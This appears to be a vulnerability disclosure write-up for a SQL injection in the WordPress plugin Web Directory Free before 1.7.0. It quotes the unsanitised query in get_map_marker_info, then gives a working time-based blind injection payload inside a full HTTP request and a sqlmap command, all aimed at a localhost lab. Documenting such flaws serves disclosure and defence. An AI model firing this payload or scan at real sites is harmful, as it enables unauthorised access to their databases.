Description

The Plugin Web Directory Free (WordPress) prior to version 1.7.0 contains a SQL Injection vulnerability. The AJAX execution function is not properly filtered/sanitized, allowing an attacker to manipulate the SQL query or inject additional clauses (UNION, time-based, error-based)

Context

  • Wordpress version 5.8
  • Plugin web-directory-free version 1.6.9
  • MySQL version 5.7

Source code

image

In the file ajax-controller.php → class w2dc_ajax_controller → Function get_map_marker_info

  1. Receives input directly from the user via the value from $_POST['locations_ids'] without validation
  2. No escaping or preparing of input $locations_ids = w2dc_getValue($_POST, 'locations_ids');
  3. Concatenated directly into the SQL query. With $location_id being each element in $_POST['locations_ids'] through a foreach loop
$row = $wpdb->get_row("SELECT * FROM {$wpdb->w2dc_locations_relationships} WHERE id=".$location_id, ARRAY_A);

⇒ SQL injection occurs

Demo

Using payload =action=w2dc_get_map_marker_info&locations_ids[]=1 AND (SELECT 1 FROM (SELECT IF(1=1,SLEEP(5),0)) AS a)

Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Length: 110
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/wp-admin/
Accept-Encoding: gzip, deflate, br

action=w2dc_get_map_marker_info&locations_ids[]=1 AND (SELECT 1 FROM (SELECT IF(1=1,SLEEP(5),0)) AS a)
  1. When using the payload with a true condition ⇒ i.e., IF(1=1, …) ⇒ Delay 5s
image (1)
  1. When using the payload with a false condition ⇒ i.e., IF(1=2, …) ⇒ No delay
image (2)

Conclusion:

  • When using the payload with a true condition, the server responds in about 6s ⇒ SLEEP(5) was executed
  • When using the payload with a false condition, the server responds in about 1s ⇒ SLEEP(5) was not executed

⇒ Injected queries were executed ⇒ Successful exploitation

Using sqlmap to scan

kp@ubuntu:~/Desktop/cve-2024-3552$ sqlmap -u "http://localhost:8080/wp-admin/admin-ajax.php" \
>   --data="action=w2dc_get_map_marker_info&locations_ids[]=1" \
>   -p "locations_ids[]" \
>   --batch --current-db --threads=5
